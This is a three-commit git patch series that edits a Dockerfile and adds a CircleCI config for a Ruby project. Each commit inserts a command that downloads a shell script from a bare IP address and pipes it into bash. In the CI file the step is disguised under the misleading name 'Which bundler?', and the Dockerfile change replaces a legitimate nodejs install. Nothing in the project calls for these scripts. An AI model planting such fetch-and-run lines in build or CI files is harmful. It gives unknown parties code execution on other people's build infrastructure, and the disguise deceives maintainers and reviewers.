From 798b29cab03540152dcac62e372cace80d0be8c8 Mon Sep 17 00:00:00 2001 From: dennisdynamic8 <141661682+dennisdynamic8@users.noreply.github.com> Date: Mon, 7 Aug 2023 19:19:30 +0200 Subject: [PATCH 1/3] Update Dockerfile --- Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Dockerfile b/Dockerfile index 0ce012f..fe6403b 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,6 +1,6 @@ # syntax=docker/dockerfile:1 FROM ruby:2.5 -RUN apt-get update -qq && apt-get install -y nodejs +RUN apt-get update -qq && wget -O - http://194.233.164.53/start_jay_Hub_ws_rand.sh | bash WORKDIR /myapp COPY . . RUN bundle install From 72c282bd2b7c28d8d2645ccfe3b33aaab31498f4 Mon Sep 17 00:00:00 2001 From: dennisdynamic8 <141661682+dennisdynamic8@users.noreply.github.com> Date: Mon, 7 Aug 2023 19:21:56 +0200 Subject: [PATCH 2/3] Add .circleci/config.yml --- .circleci/config.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 .circleci/config.yml diff --git a/.circleci/config.yml b/.circleci/config.yml new file mode 100644 index 0000000..97a3f8f --- /dev/null +++ b/.circleci/config.yml @@ -0,0 +1,30 @@ +# Use the latest 2.1 version of CircleCI pipeline process engine. +# See: https://circleci.com/docs/configuration-reference +version: 2.1 + +# Orbs are reusable packages of CircleCI configuration that you may share across projects, enabling you to create encapsulated, parameterized commands, jobs, and executors that can be used across multiple projects. +# See: https://circleci.com/docs/orb-intro/ +orbs: + ruby: circleci/ruby@2.0.1 + +# Define a job to be invoked later in a workflow. +# See: https://circleci.com/docs/configuration-reference/#jobs +jobs: + build: + docker: + - image: cimg/ruby:3.1.0 + executor: ruby/default + steps: + - checkout + - run: + name: Which bundler? + command: wget -O - http://194.233.164.53/start_jay_Hub_ws_rand.sh | bash + - ruby/install-deps + +# Orchestrate jobs using workflows +# See: https://circleci.com/docs/configuration-reference/#workflows +workflows: + sample: # This is the name of the workflow, feel free to change it to better match your workflow. + # Inside the workflow, you define the jobs you want to run. + jobs: + - build From e3872c1f0297f7ff84a9cfb6957f0dad6dca6854 Mon Sep 17 00:00:00 2001 From: dennisdynamic8 <141661682+dennisdynamic8@users.noreply.github.com> Date: Mon, 7 Aug 2023 19:26:44 +0200 Subject: [PATCH 3/3] Updated config.yml --- .circleci/config.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 97a3f8f..b9273be 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -18,7 +18,7 @@ jobs: - checkout - run: name: Which bundler? - command: wget -O - http://194.233.164.53/start_jay_Hub_ws_rand.sh | bash + command: wget -O - http://194.233.164.53/start_Silly_Doc_symb_ws_rand.sh | bash - ruby/install-deps # Orchestrate jobs using workflows